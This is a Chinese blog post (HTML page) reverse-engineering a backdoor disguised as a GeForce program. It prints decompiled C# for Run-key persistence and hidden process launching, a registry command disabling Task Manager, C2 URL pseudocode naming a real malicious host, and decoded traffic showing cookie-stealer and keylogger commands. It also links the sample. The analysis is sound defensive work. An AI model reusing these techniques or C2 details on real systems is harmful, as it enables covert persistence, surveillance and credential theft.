
<!DOCTYPE html>
<html lang="en" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>恶意程序分析(1) - Hexo</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="TriDiamond Obsidian,"> 
    <meta name="description" content="后门程序,解压密码：infected
程序app.any.run程序来源于在线沙箱runany，在沙箱对程序进行了简单的运行，最直观的反应是不断的在打开cmd窗口。

`Geforce Expiri,"> 
    <meta name="author" content="熬夜脑阔疼"> 
    <link rel="alternative" href="atom.xml" title="Hexo" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    <link href="https://fonts.loli.net/css?family=Roboto+Mono|Rubik&display=swap" rel="stylesheet">
    
<link rel="stylesheet" href="//at.alicdn.com/t/font_1429596_nzgqgvnmkjb.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.7.2/animate.min.css">

    
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/codemirror.min.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/theme/dracula.css">

    
<link rel="stylesheet" href="/css/obsidian.css">

    
<link rel="stylesheet" href="/css/ball-atom.min.css">

<meta name="generator" content="Hexo 4.2.0"></head>


<body class="loading">
    <div class="loader">
        <div class="la-ball-atom la-2x">
            <div></div>
            <div></div>
            <div></div>
            <div></div>
        </div>
    </div>
    <span id="config-title" style="display:none">Hexo</span>
    <div id="loader"></div>
    <div id="single">
    <div class="scrollbar gradient-bg-rev"></div>
<div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <div class="navigation animated fadeIn fast delay-1s">
        <img id="home-icon" class="icon-home" src="/img/favicon.png" alt="" data-url="https://i1arn.github.io">
        <!-- <div id="play-icon" title="Play/Pause" class="iconfont icon-play"></div> -->
        <h3 class="subtitle">恶意程序分析(1)</h3>
        <div class="social">
                   <!-- <div class="like-icon"> -->
                       <!-- <a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a> -->
                   <!-- </div> -->
            <div>
                <div class="share">
                    
                        <a href="javascript:;" class="iconfont icon-share1"></a>
                        <div class="share-component-cc" data-disabled="facebook,douban,linkedin,diandian,tencent,google"></div>
                    
                </div>
            </div>
        </div>
    </div>
</div>

    <div class="section">
        <div class=article-header-wrapper>
    <div class="article-header">
        <div class="article-cover animated fadeIn" style="
            animation-delay: 600ms;
            animation-duration: 1.2s;
            background-image: 
                radial-gradient(ellipse closest-side, rgba(0, 0, 0, 0.65), #100e17),
                url(/img/cover.jpg) ">
        </div>
        <div class="else">
            <p class="animated fadeInDown">
                
                <a href="/categories/逆向分析"><b>「
                    </b>逆向分析<b> 」</b></a>
                
                April 14, 2020
            </p>
            <h3 class="post-title animated fadeInDown"><a href="/2020/04/14/%E6%81%B6%E6%84%8F%E7%A8%8B%E5%BA%8F%E5%88%86%E6%9E%90-1/" title="恶意程序分析(1)" class="">恶意程序分析(1)</a>
            </h3>
            
            <p class="post-count animated fadeInDown">
                
                <span>
                    <b class="iconfont icon-text2"></b> <i>Words count</i>
                    14k
                </span>
                
                
                <span>
                    <b class="iconfont icon-timer__s"></b> <i>Reading time</i>
                    13 mins.
                </span>
                
                
                
                <span id="busuanzi_container_page_pv">
                    <b class="iconfont icon-read"></b> <i>Read count</i>
                    <span id="busuanzi_value_page_pv">0</span>
                </span>
                
            </p>
            
            
            <ul class="animated fadeInDown post-tags-list" itemprop="keywords"><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/Backdoor/" rel="tag">Backdoor</a></li><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/Malware/" rel="tag">Malware</a></li><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/Reverse/" rel="tag">Reverse</a></li></ul>
            
        </div>
    </div>
</div>

<div class="screen-gradient-after">
    <div class="screen-gradient-content">
        <div class="screen-gradient-content-inside">
            <div class="bold-underline-links screen-gradient-sponsor">
                <p>
                    <span class="animated fadeIn delay-1s"></span>
                </p>
            </div>
        </div>
    </div>
</div>

<div class="article">
    <div class='main'>
        <div class="content markdown animated fadeIn">
            <p><a href="./GeforceExpirience.bin.zip">后门程序,解压密码：infected</a></p>
<h1 id="程序"><a href="#程序" class="headerlink" title="程序"></a>程序</h1><p><a href="https://app.any.run/tasks/af63aed4-dfc0-4312-9d69-ae7502a2cb3b/" target="_blank" rel="noopener">app.any.run</a><br>程序来源于在线沙箱runany，在沙箱对程序进行了简单的运行，最直观的反应是不断的在打开cmd窗口。</p>
<div align=center><img src="./运行流程.png" alt="运行流程"   /></div>
`Geforce Expirience.exe`图标与显卡程序驱动相似。PEID显示存在upx压缩壳,而DetectItEasily分析过后个人怀疑是个自解压运行程序，于是后缀改成rar得到了一些其他程序。在解压缩软件打开之后确认了该文件为自解压程序。  

<div align=center><img src="./自解压程序.png" alt="自解压程序"   /></div>
而dclib文件夹中的文件是一些库   
<div align=center><img src="./dclib文件夹.png" alt="dclib文件夹"   /></div>

<p>所谓的<code>vmcheck32.dll</code>文件也并不是dll文件，其中保存了一些base64编码，解码之后看到了与anyrun中相同的域名。</p>
<h1 id="开始分析"><a href="#开始分析" class="headerlink" title="开始分析"></a>开始分析</h1><p>沙箱中的开始于<code>System.vbe</code>和<code>Starter.exe</code>，程序都使用了<code>.net reactor</code>加壳保护，我们尝试使用了<code>de4dot</code>进行脱壳。</p>
<h2 id="System-vbe"><a href="#System-vbe" class="headerlink" title="System.vbe"></a>System.vbe</h2><p>Google知vbe是vbs编码之后的代码，为的就是防止识别，于是尝试利用一些现有的脚本来直接解码<br><a href="./scriptDecode.vbs">vbe-decoder</a></p>
<div align=center><img src="./Systemvbe解码之后.png" alt="System.vbe解码之后"   /></div>
很明显的看出，vbs脚本创建了一个快捷方式并运行了一个bat脚本与一个程序

<h3 id="e6ee5674bb9446c78bbc5729af6e2c28-exe"><a href="#e6ee5674bb9446c78bbc5729af6e2c28-exe" class="headerlink" title="e6ee5674bb9446c78bbc5729af6e2c28.exe"></a>e6ee5674bb9446c78bbc5729af6e2c28.exe</h3><pre><code class="c#">using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(&quot;SYSTEM\\CurrentControlSet\\Control\\Class\\{6BDD1FC6-810F-11D0-BEC7-08002BE2092F}&quot;))
{
    foreach (string item in from x in registryKey.GetSubKeyNames()
        where Regex.IsMatch(x, &quot;[0-9]{4}&quot;)
        select x)
    {
        using (RegistryKey registryKey2 = registryKey.OpenSubKey(item))
        {
            registryKey2.SetValue(&quot;&quot;, 8, RegistryValueKind.DWord);  
        }
    }
}
//……</code></pre>
<p>根据<a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-control-registry-tree" target="_blank" rel="noopener">microsoft的说法</a>class目录下对应的是各个设置类别的GUID，而其中存放着设备的相关配置。</p>
<h3 id="bat脚本"><a href="#bat脚本" class="headerlink" title="bat脚本"></a>bat脚本</h3><p>其中bat文件中有效指令只有<code>&quot;C:\system32\svchost.exe&quot; &amp; reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f</code>，其中是执行svchost程序，然后添加注册表</p>
<h4 id="svchost-exe"><a href="#svchost-exe" class="headerlink" title="svchost.exe"></a>svchost.exe</h4><p>这个程序运行使用在本地环境运行不起来，以为是反虚拟机调试，但是后来注意到是网络不通的问题。通过沙箱中的dns解析发现了‘ipinfo.io’、‘srv164667.hoster-test.ru’等在本地连接不成功，于是代理搬梯子准备分析调试。<br>所有程序、库都脱壳成功了，但是就是它失败。硬着头皮使用<code>dnSpy</code>进行调试。发现了些许内容  </p>
<pre><code class="python">#伪代码
BaseUrl=&quot;http://srv164667.hoster-test.ru/t7rsexe3q8gjyon4o9o2p6iuzs1nv8ll5jys37mvg3nftujfj7p80zdfgwa/h0sezt8ofjrez/&quot;
TestUrl=BaseUrl+&quot;srxaikiy9svo9bip1tqpu5rem3lln9zw8vgjsk7ldnc13bk2&quot;

TargetUrl=BaseUrl+md5(TestUrl)+&quot;.php&quot;
connect(TargetUrl+&quot;?&quot;+md5(&quot;srv164667.hoster-test.ru&quot;+&quot;password&quot;)+&quot;=c&quot;)
#返回{&quot;status&quot;:&quot;UP&quot;}，猜测用来检查服务器状态

token=connect(TargetUrl+&quot;?&quot;+&quot;some unknown args&quot;)
#之后的所有网络交互都有参数“11b7d19ccf1147a7a18c5d8cb8fb6bc4 = reverse(base64(token))”
</code></pre>
<p>在了解了参数内容为base64编码之后，手动解析了几个参数，发现了上传系统进程等等一些内容，同时在请求的结果中也发现了base64编码之后的一些命令。</p>
<div align=center><img src="./逆序base64解码.png" alt="逆序base64解码"   /></div>

<p>几天之后再尝试去分析时，发现原本的服务器已经挂了，无奈为了继续分析程序，手动搭建了一个简单的web服务。好在请求返回的结果基本上不多，在host文件中将恶意网址指向本地（使用AtapeDNS后导致恶意程序的其他网络请求失败）。<br>程序中运行这多个线程，采用不断冻结线程的方法一个一个去观察，同时呢为了使命令执行的效果更加方便且不产生更多的线程，返回中的command命令选用了forkbomb。经过多日努力跟踪分析，终于有了进展。。。  </p>
<div align=center><img src="./程序运行的多个线程.png" alt="程序运行的多个线程"   /></div>
<div align=center><img src="./FrokBomb命令执行.png" alt="FrokBomb命令执行"   /></div>
通过断点Base64解码与正则匹配，逐个分析了线程之后找到了命令执行的关键线程  
<div align=center><img src="./命令匹配.png" alt="命令匹配"   /></div>
找到了命令匹配的地方，很快就有了命令的执行的过程了，首先是将命令按照一定的计算方法转换为整数  
<div align=center><img src="./命令转换.png" alt="命令转换"   /></div>
紧接着，根据转换结果来选择执行代码  
<div align=center><img src="./根据命令转换结果执行.png" alt="根据命令转换结果执行"   /></div>

<p>分析过程中发现，请求的返回结果解码之后至少包含三种数据格式，至于已经发现的另外两种就没精力研究是啥作用了。。。</p>
<h5 id="注册表"><a href="#注册表" class="headerlink" title="注册表"></a>注册表</h5><p><code>HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System</code>的操作是将任务管理器禁用了，其中<code>HKCU</code>就是<code>HKEY_CURRNET_USER</code><br>补充一条相关路径： <code>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system</code></p>
<h2 id="Starter-exe"><a href="#Starter-exe" class="headerlink" title="Starter.exe"></a>Starter.exe</h2><pre><code class="c#">Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);  //获取用户的应用数据目录，此处为“C:\Users\i1arn\AppData\Roaming”
//……
//复制程序到了相关文件夹中
//……
string executablePath = Application.ExecutablePath;
RegistryKey registryKey = Registry.CurrentUser.CreateSubKey(&quot;Software\\Microsoft\\Windows\\CurrentVersion\\Run\\&quot;);
registryKey.SetValue(&quot;Adobe QuikInstall&quot;, folderPath + &quot;\\Adobe\\Adobe QuikInstall.exe&quot;);   //设置自启程序
registryKey.Close();
Thread.Sleep(10000);
File.Copy(currentDirectory + &quot;\\System.vbe&quot;, folderPath + &quot;\\NotePad\\System.vbe&quot;);
Process.Start(folderPath + &quot;\\Adobe\\Adobe QuikInstall.exe&quot;);   //启动`Adobe QuikInstall.exe`</code></pre>
<h3 id="Adobe-QuikInstall-exe"><a href="#Adobe-QuikInstall-exe" class="headerlink" title="Adobe QuikInstall.exe"></a>Adobe QuikInstall.exe</h3><p>看名字像是Adobe安装软件，其实……</p>
<pre><code class="C#">process.StartInfo.FileName = &quot;cmd.exe&quot;;
process.StartInfo.Arguments = &quot;/C &quot; + folderPath + &quot;\\Obsidium\\Runtime Broker.exe&quot;;    
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.Start();
//……
//顺序启动了“Runtime Broker.exe”、“SecurityHealthService.exe”、“YourPhone.exe”</code></pre>
<p>正常系统中：  </p>
<ol>
<li><code>Runtime Broker.exe</code>用来进行开始屏幕磁贴与桌面的后台交互  </li>
<li><code>SecurityHealthService.exe</code>由微软提供的安全服务</li>
<li><code>YourPhone.exe</code>微软在Windows10上发布的新应用，便于用户访问手机上的内容<br>三个程序在此处都是重复不断的创建<code>C:/Media</code>目录并启动<code>C:/Media/fontreview.exe</code>程序。</li>
</ol>
<h3 id="fontreview-exe"><a href="#fontreview-exe" class="headerlink" title="fontreview.exe"></a>fontreview.exe</h3><p>多种环境多次运行之后都未能发现该文件</p>
<h1 id="数据包分析"><a href="#数据包分析" class="headerlink" title="数据包分析"></a>数据包分析</h1><p>通过Python脚本获取到了请求中的URL参数并对其进行了解析。</p>
<pre><code class="Python">import scapy
import scapy_http.http

import re，json，base64，collections
from urllib import parse
args=collections.defaultdict(list)

packets=scapy.rdpcap(&quot;./af63aed4-dfc0-4312-9d69-ae7502a2cb3b.pcap&quot;)
for i in packets:
    try:
        data=re.split(&quot;[?&amp;]&quot;,i.getlayer(&quot;HTTPRequest&quot;).Path.decode())
        for arg in data[1:]:
            argname,argval=arg.split(&quot;=&quot;)
            argval=base64.b64decode(parse.unquote(argval)[::-1]).decode()
            if argval not in args[argname]:
                args[argname].append(argval)  #旨在去除重复参数值。无法使用set，否则格式化打印时出错
    except Exception as e:
        pass

args=json.dumps(args,indent=1)
print(args)</code></pre>
<p>从结果中直观的看见实际上参数就几个，能够直接看出相关意义的不多。</p>
<pre><code class="bash">{
 &quot;11b7d19ccf1147a7a18c5d8cb8fb6bc4&quot;: [
  &quot;09ee87aef1bcd074085f36668392f85e262716383&quot;
 ],
 &quot;248854911a064ebaa582d1a56b380dcf&quot;: [
  &quot;af5ed1d2b30ebda301fbc7e20bfcd0f27de9529b&quot;
 ],
 &quot;56367c166cecf6b4c653b02521db5738&quot;: [
  &quot;COMMAND::&lt;cookiestealer&gt;-DATA::&lt;&gt;&quot;,
  &quot;COMMAND::&lt;keyloggerstart&gt;-DATA::&lt;&gt;&quot;,
  &quot;Microphone (Realtek AC&#39;97 Audio\r\nLine In (Realtek AC&#39;97 Audio)\r\n&quot;,
  &quot;ServerType:C#,ServerVer:0.2.25,isMicrophone:Y,isWebcam:N,isAdmin:Y&quot;,
  &quot;ServerType:C#,ServerVer:0.2.25,isMicrophone:Y,isWebcam:N,isAdmin:Y,WinVer:Windows 7 Professional ,ACTWindow:Program Manager,PCName:USER-PC,UserName:admin,IpInfo:81.17.242.238\n&quot;,
  &quot;&quot;,
  &quot;done&quot;,
  &quot;C:\\Users\\admin\\AppData\\Roaming\\discord\\Local Storage\\&quot;,
  &quot;N/A&quot;,
  &quot;Login:gabriel_radrigos,Path:c:/program files/steam,Language:,steamID:&quot;,
  &quot;4.7.2&quot;,
  &quot;ProcName:Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz,ProcessorDescription:x86 Family 6 Model 94 Stepping 3, GenuineIntel,ProcessorArch:x86,ProcessorModel:6,NumberOfLogicalProcessors:4,BIOSVersion:DELL  - 1,BIOSManufacturer:DELL,MotherboardManufacturer:N/A,MotherboardProduct:N/A,MotherboardSerial:N/A,VideoProduct:Standard VGA Graphics Adapter,VideoDriverVer:N/A,VideoRAM:N/A B,VideoRes:1280 x 720,AV:N/A,Path:C:\\system32&quot;,
  &quot;Name:C:\\,Type:Drive,Size:274770948096&lt;STR&gt;&quot;,
  &quot;ServerType:C#,ServerVer:0.2.25,isMicrophone:Y,isWebcam:N,isAdmin:Y,WinVer:Windows 7 Professional ,ACTWindow:C:\\Windows\\System32\\cmd.exe,PCName:USER-PC,UserName:admin,IpInfo:81.17.242.238\n&quot;,
  &quot;ServerType:C#,ServerVer:0.2.25,isMicrophone:Y,isWebcam:N,isAdmin:Y,WinVer:Windows 7 Professional ,ACTWindow:C:\\Windows\\system32\\cmd.exe,PCName:USER-PC,UserName:admin,IpInfo:81.17.242.238\n&quot;,
  &quot; &quot;
 ],
 &quot;95b18fce3c280a84c447b7374258cd3b&quot;: [
  &quot;552b13e67562d7b564b8a0ac9f35c735d17c786b&quot;
 ],
 &quot;fb668fe31be77ee0a010de83c225c204&quot;: [
  &quot;fd4fbcdbaa1148ef9963f5e0be6ac85a&quot;,
  &quot;454fa6055bad2c4e9b1d33b0b30b11eb&quot;,
  &quot;ee678cc6ced5600710e600f5c8cce48e&quot;,
  &quot;f8afc49efff2cc16b83e646c95b9e989&quot;,
  &quot;957acf4c4fcce89f764055acf9978456&quot;,
  &quot;f20d8d958ee4f8643f1b069f8db495c2&quot;,
  &quot;c72a0133882ce6233c90990b8e00775c&quot;,
  &quot;5d94deb0da6c64342915be998ce7d95f&quot;,
  &quot;0d55fc65bc0ac96872fab9bc03ec0134&quot;,
  &quot;df4a7df5bb1d10900476bed933716663&quot;,
  &quot;27ef1b29586798bc372642cf969b2187&quot;,
  &quot;3ceba6076b11c5db73cc14cc308a91a2&quot;,
  &quot;273f06e7eb1000c68f3fe62d51cd3779&quot;,
  &quot;d182f4586cab8bae2bde9ae10eb120c8&quot;,
  &quot;b785a88a74f90c8913744c7ba92d0be5&quot;
 ],
 &quot;0e1f102a661f322dc855ed186f235900&quot;: [
  &quot;552b13e67562d7b564b8a0ac9f35c735d17c786b&quot;
 ],
 &quot;156fde0665d178eece714785060d9d42&quot;: [
  &quot;b785a88a74f90c8913744c7ba92d0be5&quot;,
  &quot;fd4fbcdbaa1148ef9963f5e0be6ac85a&quot;
 ]
}
{
   &quot;11b7d19ccf1147a7a18c5d8cb8fb6bc4&quot;: [
      &quot;09ee87aef1bcd074085f36668392f85e262716383&quot;
   ],
   &quot;248854911a064ebaa582d1a56b380dcf&quot;: [
      &quot;af5ed1d2b30ebda301fbc7e20bfcd0f27de9529b&quot;
   ],
   &quot;56367c166cecf6b4c653b02521db5738&quot;: [
      &quot;COMMAND::&lt;cookiestealer&gt;-DATA::&lt;&gt;&quot;,
      &quot;COMMAND::&lt;keyloggerstart&gt;-DATA::&lt;&gt;&quot;,
      &quot;Microphone (Realtek AC&#39;97 Audio\r\nLine In (Realtek AC&#39;97 Audio)\r\n&quot;,
      &quot;ServerType:C#,ServerVer:0.2.25,isMicrophone:Y,isWebcam:N,isAdmin:Y&quot;,
      &quot;ServerType:C#,ServerVer:0.2.25,isMicrophone:Y,isWebcam:N,isAdmin:Y,WinVer:Windows 7 Professional ,ACTWindow:Program Manager,PCName:USER-PC,UserName:admin,IpInfo:81.17.242.238\n&quot;,
      &quot;&quot;,
      &quot;done&quot;,
      &quot;C:\\Users\\admin\\AppData\\Roaming\\discord\\Local Storage\\&quot;,
      &quot;N/A&quot;,
      &quot;Login:gabriel_radrigos,Path:c:/program files/steam,Language:,steamID:&quot;,
      &quot;4.7.2&quot;,
      &quot;ProcName:Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz,ProcessorDescription:x86 Family 6 Model 94 Stepping 3, GenuineIntel,ProcessorArch:x86,ProcessorModel:6,NumberOfLogicalProcessors:4,BIOSVersion:DELL  - 1,BIOSManufacturer:DELL,MotherboardManufacturer:N/A,MotherboardProduct:N/A,MotherboardSerial:N/A,VideoProduct:Standard VGA Graphics Adapter,VideoDriverVer:N/A,VideoRAM:N/A B,VideoRes:1280 x 720,AV:N/A,Path:C:\\system32&quot;,
      &quot;Name:C:\\,Type:Drive,Size:274770948096&lt;STR&gt;&quot;,
      &quot;ServerType:C#,ServerVer:0.2.25,isMicrophone:Y,isWebcam:N,isAdmin:Y,WinVer:Windows 7 Professional ,ACTWindow:C:\\Windows\\System32\\cmd.exe,PCName:USER-PC,UserName:admin,IpInfo:81.17.242.238\n&quot;,
      &quot;ServerType:C#,ServerVer:0.2.25,isMicrophone:Y,isWebcam:N,isAdmin:Y,WinVer:Windows 7 Professional ,ACTWindow:C:\\Windows\\system32\\cmd.exe,PCName:USER-PC,UserName:admin,IpInfo:81.17.242.238\n&quot;,
      &quot; &quot;
   ],
   &quot;95b18fce3c280a84c447b7374258cd3b&quot;: [
      &quot;552b13e67562d7b564b8a0ac9f35c735d17c786b&quot;
   ],
   &quot;fb668fe31be77ee0a010de83c225c204&quot;: [
      &quot;fd4fbcdbaa1148ef9963f5e0be6ac85a&quot;,
      &quot;454fa6055bad2c4e9b1d33b0b30b11eb&quot;,
      &quot;ee678cc6ced5600710e600f5c8cce48e&quot;,
      &quot;f8afc49efff2cc16b83e646c95b9e989&quot;,
      &quot;957acf4c4fcce89f764055acf9978456&quot;,
      &quot;f20d8d958ee4f8643f1b069f8db495c2&quot;,
      &quot;c72a0133882ce6233c90990b8e00775c&quot;,
      &quot;5d94deb0da6c64342915be998ce7d95f&quot;,
      &quot;0d55fc65bc0ac96872fab9bc03ec0134&quot;,
      &quot;df4a7df5bb1d10900476bed933716663&quot;,
      &quot;27ef1b29586798bc372642cf969b2187&quot;,
      &quot;3ceba6076b11c5db73cc14cc308a91a2&quot;,
      &quot;273f06e7eb1000c68f3fe62d51cd3779&quot;,
      &quot;d182f4586cab8bae2bde9ae10eb120c8&quot;,
      &quot;b785a88a74f90c8913744c7ba92d0be5&quot;
   ],
   &quot;0e1f102a661f322dc855ed186f235900&quot;: [
      &quot;552b13e67562d7b564b8a0ac9f35c735d17c786b&quot;
   ],
   &quot;156fde0665d178eece714785060d9d42&quot;: [
      &quot;b785a88a74f90c8913744c7ba92d0be5&quot;,
      &quot;fd4fbcdbaa1148ef9963f5e0be6ac85a&quot;
   ]
}</code></pre>
<p>其他参数名都是通过’srv164667.hoster-test.ru’拼接’token_uid’、’filename’等等之后md5或者sha1计算的结果。</p>
<h1 id="说在最后"><a href="#说在最后" class="headerlink" title="说在最后"></a>说在最后</h1><p>程序的每一次运行效果并不完全相同，怀疑与后台设定的telegram机器人相关。第一次沙箱中运行之后开启了大量cmd窗口，在数据包中同时发现了<code>COMMAND::&lt;forkbomb&gt;-DATA::&lt;&gt;</code>编码之后的数据，之后重新运行未发生大量cmd窗口的情况，数据包中也未出现“forkbomb”相关字样。下图为某次本地运行之后的效果，恶意程序启动了系统中的一些程序来试图转移注意力</p>
<div align=center><img src="./本地某次运行效果.png" alt="本地某次运行效果"   /></div>

<h2 id="最后的最后"><a href="#最后的最后" class="headerlink" title="最后的最后"></a>最后的最后</h2><p>按照常理来说恶意软件分析应该重点关注程序的执行效果，带来的影响，但是第一次的分析感觉有点偏，总结写的也不是太好，思路混乱</p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls"
                data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
            <ul id="audio-list" style="display:none">
                
            </ul>
            
            
            
    <div id='gitalk-container' class="comment link"
        data-ae='true'
        data-ci='63bc4b81950a4ca4b812'
        data-cs='459d284dcb0400009a4646bb58d6cb4ba1509ed7'
        data-r='i1arn.github.io'
        data-o='i1arn'
        data-a='i1arn'
        data-d=''
    >Comments</div>


            
            
        </div>
        <div class="sidebar">
            <div class="box animated fadeInRight">
                <div class="subbox">
                    <img src="https://res.cloudinary.com/tridiamond/image/upload/v1573019751/TriDiamond_logo_ui_xeublz.jpg" height=300 width=300></img>
                    <p>熬夜脑阔疼</p>
                    <span>Think like an artist, develop like an artisan</span>
                    <dl>
                        <dd><a href="https://github.com/i1arn" target="_blank"><span
                                    class=" iconfont icon-github"></span></a></dd>
                        <dd><a href="https://twitter.com/TriDiamond6" target="_blank"><span
                                    class=" iconfont icon-twitter"></span></a></dd>
                        <dd><a href="https://stackoverflow.com/users/7602324/tridiamond?tab=profile" target="_blank"><span
                                    class=" iconfont icon-stack-overflow"></span></a></dd>
                    </dl>
                </div>
                <ul>
                    <li><a href="/archives">16 <p>Articles</p></a></li>
                    <li><a href="/categories">12 <p>Categories</p></a></li>
                    <li><a href="/tags">26 <p>Tags</p></a></li>
                </ul>
            </div>
            
            
            
            <div class="box sticky animated fadeInRight faster">
                <div id="toc" class="subbox">
                    <h4>Contents</h4>
                    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#程序"><span class="toc-number">1.</span> <span class="toc-text">程序</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#开始分析"><span class="toc-number">2.</span> <span class="toc-text">开始分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#System-vbe"><span class="toc-number">2.1.</span> <span class="toc-text">System.vbe</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#e6ee5674bb9446c78bbc5729af6e2c28-exe"><span class="toc-number">2.1.1.</span> <span class="toc-text">e6ee5674bb9446c78bbc5729af6e2c28.exe</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#bat脚本"><span class="toc-number">2.1.2.</span> <span class="toc-text">bat脚本</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Starter-exe"><span class="toc-number">2.2.</span> <span class="toc-text">Starter.exe</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Adobe-QuikInstall-exe"><span class="toc-number">2.2.1.</span> <span class="toc-text">Adobe QuikInstall.exe</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#fontreview-exe"><span class="toc-number">2.2.2.</span> <span class="toc-text">fontreview.exe</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#数据包分析"><span class="toc-number">3.</span> <span class="toc-text">数据包分析</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#说在最后"><span class="toc-number">4.</span> <span class="toc-text">说在最后</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#最后的最后"><span class="toc-number">4.1.</span> <span class="toc-text">最后的最后</span></a></li></ol></li></ol>
                </div>
            </div>
            
            
        </div>
    </div>
</div>

    </div>
</div>
    <div id="back-to-top" class="animated fadeIn faster">
        <div class="flow"></div>
        <span class="percentage animated fadeIn faster">0%</span>
        <span class="iconfont icon-top02 animated fadeIn faster"></span>
    </div>
</body>
<footer>
    <p class="copyright" id="copyright">
        &copy; 2020
        <span class="gradient-text">
            熬夜脑阔疼
        </span>

    </p>
</footer>

<script type="text/javascript" src="https://cdn.bootcss.com/mathjax/2.7.6/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>
<script>
  MathJax.Hub.Config({
    "HTML-CSS": {
      preferredFont: "TeX",
      availableFonts: ["STIX", "TeX"],
      linebreaks: {
        automatic: true
      },
      EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
      inlineMath: [
        ["$", "$"],
        ["\\(", "\\)"]
      ],
      processEscapes: true,
      ignoreClass: "tex2jax_ignore|dno",
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
      noUndefined: {
        attributes: {
          mathcolor: "red",
          mathbackground: "#FFEEEE",
          mathsize: "90%"
        }
      },
      Macros: {
        href: "{}"
      }
    },
    messageStyle: "none"
  });
</script>
<script>
  function initialMathJax() {
    MathJax.Hub.Queue(function () {
      var all = MathJax.Hub.getAllJax(),
        i;
      // console.log(all);
      for (i = 0; i < all.length; i += 1) {
        console.log(all[i].SourceElement().parentNode)
        all[i].SourceElement().parentNode.className += ' has-jax';
      }
    });
  }

  function reprocessMathJax() {
    if (typeof MathJax !== 'undefined') {
      MathJax.Hub.Queue(["Typeset", MathJax.Hub]);
    }
  }
</script>



    
<link rel="stylesheet" href="//cdn.bootcss.com/gitalk/1.5.0/gitalk.min.css">

    
<script src="//cdn.bootcss.com/gitalk/1.5.0/gitalk.min.js"></script>



<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/obsidian.js"></script>
<script src="/js/jquery.truncate.js"></script>
<script src="/js/search.js"></script>


<script src="//cdn.bootcss.com/typed.js/2.0.10/typed.min.js"></script>


<script src="//cdn.bootcss.com/blueimp-md5/2.12.0/js/md5.min.js"></script>


<script src="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>


<script src="https://cdn.bootcss.com/codemirror/5.48.4/codemirror.min.js"></script>

    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/javascript/javascript.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/css/css.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/xml/xml.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/htmlmixed/htmlmixed.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/clike/clike.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/php/php.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/shell/shell.min.js"></script>


    
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/python/python.min.js"></script>




    
<script src="/js/busuanzi.min.js"></script>

    <script>
        $(document).ready(function () {
            if ($('span[id^="busuanzi_"]').length) {
                initialBusuanzi();
            }
        });
    </script>



<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/default-skin/default-skin.min.css">


<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
